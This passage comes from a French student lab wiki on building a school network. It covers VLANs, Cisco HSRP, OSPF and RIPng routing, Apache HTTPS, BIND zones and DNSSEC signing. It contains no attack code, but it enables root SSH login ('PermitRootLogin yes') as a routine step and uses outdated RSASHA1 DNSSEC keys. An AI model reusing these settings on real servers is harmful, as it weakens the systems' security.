| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
